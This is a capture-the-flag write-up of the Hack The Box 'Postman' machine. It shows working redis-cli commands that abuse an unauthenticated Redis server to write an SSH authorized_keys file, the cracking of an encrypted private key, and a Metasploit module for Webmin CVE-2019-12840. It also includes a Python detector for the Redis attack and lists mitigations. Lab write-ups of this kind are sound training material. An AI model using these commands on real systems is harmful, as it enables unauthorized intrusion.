Hack The Box - Postman Writeup

System Information



Initial Enumeration

The Nmap scan shows some services available:


  • Port 10000 is usually allocated to and used by Webmin, a well-known web application where users can manage a Linux system
  • Port 6379 is used by the redis server, an in-memory data store that can be used as a database, cache or message broker

My first check was to look for known vulnerabilities of webmin (there have been some in the past), but it seemed not vulnerable to any RCE or other remote vulnerability.
I also tried some bruteforcing of accounts but with no result.


Initial foothold

So my focus turned to redis.

According to an article by the redis author (http://antirez.com/news/96, also mirrored at https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html), there is no security model in the redis server.
It's up to the administrator to put security measures upstream (i.e. not exposing it to untrusted users, etc.).

The articles also explain (in an obfuscated way) how to leverage some features/commands to write files into the server's filesystem.

The next step for exploitation is understanding and trying to use the same commands (maybe in a different order).
First is to find the home folder of the redis process: in Debian (and derivative distros) the redis server runs as the redis user and its home folder is /var/lib/redis

So the exploitation we can try is to write an SSH key of our choice in /var/lib/redis/.ssh/ with the filename authorized_keys

We can create an SSH key pair and put the public part in key.txt, while the private part can be put in id_rsa

Next we can connect to redis with the client:

# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir "/var/lib/redis/.ssh"
1) "dir"
2) "/var/lib/redis/.ssh"
(0.70s)
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
(0.51s)
10.10.10.160:6379> save
OK
(1.04s)                             
10.10.10.160:6379>

The commands given above configure the redis server such that the database file is /var/lib/redis/.ssh/authorized_keys

Then we can pass the public key to the redis server, which will save it in the "database":
# cat key.txt | redis-cli  -h 10.10.10.160 -x set attack3
OK

# redis-cli  -h 10.10.10.160 save
OK

After these commands we should be able to log on to the server using the private part of the key:

# ssh -i id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Nov  5 09:15:54 2019 from 10.10.15.223
redis@Postman:~$ uptime
 09:17:14 up 2 min,  2 users,  load average: 19.64, 8.00, 2.99
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)


And we are in the system as redis.

This foothold will disappear in a short time if someone else exploits it the same way by overwriting our SSH public key, or if someone resets the box (the filesystem will return to a clean state).
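From the defender's side, the sequence above (CONFIG SET dir, CONFIG SET dbfilename, SAVE) is easy to spot in the server's MONITOR stream. The following detection script is an added example, not part of the original writeup: it parses constructed MONITOR lines (the format is `<unix time> [<db> <ip:port>] "cmd" "arg" ...`) and flags any client that redirects the dump away from /var/lib/redis or to a non-.rdb filename and then persists it; the IP and the data directory are taken from the post, everything else is constructed.

```python
import re
import shlex

# Constructed sample of Redis MONITOR output (not captured from the box); the
# real format is: <unix time> [<db> <client ip:port>] "cmd" "arg" ...
SAMPLE_MONITOR = """\
1572945300.101 [0 10.10.15.223:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
1572945301.202 [0 10.10.15.223:51234] "config" "set" "dbfilename" "authorized_keys"
1572945302.303 [0 10.10.15.223:51234] "set" "attack3" "ssh-rsa AAAA...constructed"
1572945303.404 [0 10.10.15.223:51234] "save"
1572945310.505 [0 10.10.15.224:51300] "get" "session:42"
"""

LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')

def parse_monitor(text):
    """Yield (client, argv) for each MONITOR line; argv is the command as a list."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # shlex handles the double-quoted tokens Redis prints
            yield m.group(3), shlex.split(m.group(4))

def detect_rdb_redirect(text, expected_dir="/var/lib/redis"):
    """Flag a client that points the RDB dump somewhere unexpected and then persists it.

    Returns a list of (client, dir, dbfilename) tuples, one per suspicious SAVE/BGSAVE.
    """
    state = {}        # client -> {"dir": ..., "dbfilename": ...}
    findings = []
    for client, argv in parse_monitor(text):
        if not argv:
            continue
        cmd = argv[0].lower()
        s = state.setdefault(client, {})
        if cmd == "config" and len(argv) >= 4 and argv[1].lower() == "set":
            key = argv[2].lower()
            if key in ("dir", "dbfilename"):
                s[key] = argv[3]
        elif cmd in ("save", "bgsave"):
            odd_dir = "dir" in s and s["dir"].rstrip("/") != expected_dir
            odd_name = "dbfilename" in s and not s["dbfilename"].endswith(".rdb")
            if odd_dir or odd_name:
                findings.append((client, s.get("dir"), s.get("dbfilename")))
    return findings

if __name__ == "__main__":
    for client, d, name in detect_rdb_redirect(SAMPLE_MONITOR):
        print(f"{client}: SAVE with dir={d!r} dbfilename={name!r}")
```

The same state machine works on `redis-cli monitor` output piped in live; the usual mitigations (bind to localhost, protected-mode, requirepass, renaming CONFIG) remove the condition entirely.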

User flag


The next step is to enumerate to find a way to escalate to another user... There are many ways (LinEnum, find, etc.).
We can find an RSA private key in /opt/id_rsa.bak



Unfortunately we can't use it directly because it's encrypted, but there is a tool named ssh2john.py that converts the key to a format that John the Ripper can crack

When we have the key converted we can crack it with the rockyou wordlist:

So the password is computer2008
We can use it to log in as the user Matt and get the user flag:


Root Flag

User Matt is part of the adm group:

So let's try to log in to webmin as Matt


This version of webmin is 1.910 and there is a known vulnerability (CVE-2019-12840) that can be exploited by an authenticated user to execute commands:


There is even a Metasploit module for this CVE, named linux/http/webmin_packageup_rce
We can use it by setting the relevant variables

And then run the exploit, getting a shell as the user that webmin runs as (since webmin is used to manage the system, it runs as root)



And we can then show the root flag:
